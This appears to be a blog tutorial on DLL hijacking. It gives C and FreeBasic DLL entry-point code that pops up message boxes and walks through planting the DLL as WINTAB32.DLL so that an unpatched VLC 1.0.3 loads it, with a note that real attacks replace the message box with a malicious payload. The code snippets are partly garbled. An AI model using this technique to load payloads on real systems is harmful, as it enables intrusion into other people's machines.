DLL Hijacking


Due to a vulnerability commonly known as DLL hijacking, many programs will load and execute a malicious DLL contained in the same folder as a file on a remote system. The vulnerability was discovered by HD Moore, who has published an exploit for the open-source based penetration testing software Metasploit.
Source: Wikipedia

DLL HIJACKING also known as DLL Path Injection is a very popular method in which an application known to be vulnerable is (ab)used to use it as a loader of a malicious DLL. The way it works is that a DLL with a same name which same exports same functions  is placed in the directory in which the application or the associated file which the application will load. The main idea is that the application will load our library instead of the original in it’s memory using LoadLibrary() function exported by KERNEL32.DLL thus calling the malicious code in the DLL’s entry-point (DLLMain or DllEntryPoint) which contains our malicious payload.

#include <windows.h>

/*           COMPILE(D) WITH LCC   */

                if (dwReason == DLL_PROCESS_ATTACH)
                                MessageBox(0,"DLL Attached","DLL Message", 0);
                else if (dwReason == DLL_PROCESS_DETACH)
                                MessageBox(0,"DLL Detaching","DLL Message", 0);
                if (dwReason == DLL_THREAD_ATTACH)
                                MessageBox(0,"DLL Thread Attached","DLL Message", 0);
                else if (dwReason == DLL_THREAD_DETACH)
                                MessageBox(0,"DLL Thread Detaching","DLL Message", 0);
return TRUE;
''  COMPILE AS: fbc PATH-TO-FILE.BAS -dll -Wl " -entry _DllEntryPoint@12"

#include "windows.bi"
Function DllEntryPoint stdcall Alias "DllEntryPoint" (hInstDLL As HINSTANCE, _
                                dwReason As DWORD, lpvReserved As LPVOID) As BOOL Export
                if (dwReason = DLL_PROCESS_ATTACH) then
                                MessageBox(0,"DLL Attached","DLL Message", 0)
                elseif (dwReason = DLL_PROCESS_DETACH) then
                                MessageBox(0,"DLL Detaching","DLL Message", 0)
                elseif (dwReason = DLL_THREAD_ATTACH) then
                                MessageBox(0,"DLL Thread Attached","DLL Message", 0)
                                MessageBox(0,"DLL Thread Detaching","DLL Message", 0)
                End if
return TRUE
End Function     

In the sample codes above, the first one is to be compiled in C and / or the second one is to be compiled in FreeBasic.


First, find a vulnerable software and the associated DLL name which it is bound to load. A list of all Vulnerable Softwares along with their associated DLL Names can be found here.

One of the vulnerable softwares was Videolan VLC Media Player. The Software has been patched now. But, this doesnot mean that the old versions are immune. VLC Media Player V1.0.3 is vulnerable and so is a software called Xilisoft. Both of these have same Dll loading that is: Wintab32.DLL. Visual Basic 6 IDE is also vulnerable. The VB6 IDE loads a DLL called vb6ide.dll.


This one is for Videolan VLC Media Player V1.0.3:
1.      Install VLC Media Player (Unpatched Version). Note that VLC has an official statement   regarding the patching of the vulnerability and the software is no more vulnerable.
2.      Copy a MP3 File to some folder on the Computer (eg. X:\SOMEFOLDER\SOMEFILE.MP3).
3.      Compile the aboe code to DLL and rename the DLL as WINTAB32.DLL and now, open the MP3 file. And, you should see MessageBox popup saying DLL ATTACHED.
1.      It is upto you to either export all the functions or simply compile ony the malicious code. Depending on the Software and situation, the program may crash after your DLL has been loaded if you don’t export all those funtions thatthe program is known to use.
2.      The DLL will be loaded in the above scenario and the MP3 file will keep on playing as on VLC V1.0.3.
3.      Just to try out the demo in VLC, it is not necessry that you have a real MP3 file. You may create a Text Document and append.MP3 in it’s extentsion (change the extension from Text Document to that of MP3) and load the file.
And, you should see the Messagebox like in the Snapshot above
Found this post useful ? If so, please Click +1 and RECOMMEND THIS SITE on Google

No comments:

Post a Comment